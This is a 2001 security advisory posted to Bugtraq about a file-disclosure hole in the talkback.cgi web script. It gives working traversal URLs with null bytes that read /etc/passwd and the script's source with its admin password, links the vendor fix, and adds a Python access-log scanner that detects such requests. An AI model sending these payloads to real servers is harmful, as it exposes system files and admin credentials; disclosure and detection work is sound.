Date:         Mon, 9 Apr 2001 17:44:23 +0200
From: Stan <stan@WHIZKUNDE.ORG>
Subject:      talkback.cgi vulnerability may allow users to read any file
To: BUGTRAQ@SECURITYFOCUS.COM

[whizkunde security advisory: talkback (CGI)]
http://www.whizkunde.org | stan@whizkunde.org

----------------------------------------------------------
Release date: April 9th 2001
Subject: talkback.cgi security problem
Systems affected: UNIX systems running talkback CGI script
Vendor: http://www.waytotheweb.com
----------------------------------------------------------

1. problem
Talkback.cgi may allow remote users (website visitors) to
view any file on a webserver (depending on the user the
webserver is running as).

Consider this URL:

http://www.VULNERABLE-HOST.com/cgi-bin/talkback.cgi?article=
../../../../../../../../etc/passwd%00&action=view&matchview=1

This will display /etc/passwd (if the webserver user has
access to this file).

Another URL can display the source of talkback.cgi itself,
which contains the admin password:

http://www.VULNERABLE-HOST.com/cgi-bin/talkback.cgi?article=
../cgi-bin/talkback.cgi%00&action=view&matchview=1

(You might have to use another URL instead of
../cgi-bin/talkback.cgi%00, this depends on where the
cgi-bin is installed.)

In this file you can find $admin_password that can be used in

http://www.VULNERABLE-HOST.com/cgi-bin/talkback.cgi?action=admin

to post & delete articles.

2. fix
Way To The Web has released an updated version of
talkback.cgi that isn't vulnerable to this problem:

http://www.waytotheweb.com/webscripts/talkback.htm
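
Added example, not part of the original advisory or the vendor's code: a Python check that scans web server access-log lines for requests of the kind shown in section 1, where the article parameter carries parent-directory segments or a null byte. The log entries are constructed, and the function names and the Common Log Format layout are assumptions.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Request line inside a Common Log Format entry (assumed log layout).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample entries, not taken from a real server.
SAMPLE_LOG = [
    '192.0.2.10 - - [09/Apr/2001:17:40:01 +0200] "GET /cgi-bin/talkback.cgi?article=12&action=view&matchview=1 HTTP/1.0" 200 5120',
    '192.0.2.77 - - [09/Apr/2001:17:41:13 +0200] "GET /cgi-bin/talkback.cgi?article=../../../../../../../../etc/passwd%00&action=view&matchview=1 HTTP/1.0" 200 1843',
    '192.0.2.77 - - [09/Apr/2001:17:41:50 +0200] "GET /cgi-bin/talkback.cgi?article=../cgi-bin/talkback.cgi%00&action=view&matchview=1 HTTP/1.0" 200 20480',
    '192.0.2.10 - - [09/Apr/2001:17:42:02 +0200] "GET /index.html HTTP/1.0" 200 300',
]

def suspicious_article(value):
    """Return the reasons an already URL-decoded `article` value is suspect."""
    # Decode once more in case the value was logged with an extra encoding layer.
    decoded = unquote(value)
    reasons = []
    if "\x00" in decoded:
        reasons.append("null byte")
    if ".." in decoded.replace("\\", "/").split("/"):
        reasons.append("parent-directory segment")
    return reasons

def scan(lines, script="talkback.cgi"):
    """Return (line_number, reasons) for each suspect request to `script`."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        target = urlsplit(match.group(1))
        if not target.path.endswith("/" + script):
            continue
        query = parse_qs(target.query, keep_blank_values=True)
        for value in query.get("article", []):
            reasons = suspicious_article(value)
            if reasons:
                hits.append((number, reasons))
    return hits

if __name__ == "__main__":
    for number, reasons in scan(SAMPLE_LOG):
        print(f"line {number}: {', '.join(reasons)}")
```

A hit whose response status is 200 with a body size unlike normal article views is worth following up, since the script source holds $admin_password.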

----------------------------------------------------------
Stan a.k.a. ThePike
stan@whizkunde.org
http://www.whizkunde.org

Copyright whizkunde security team 2001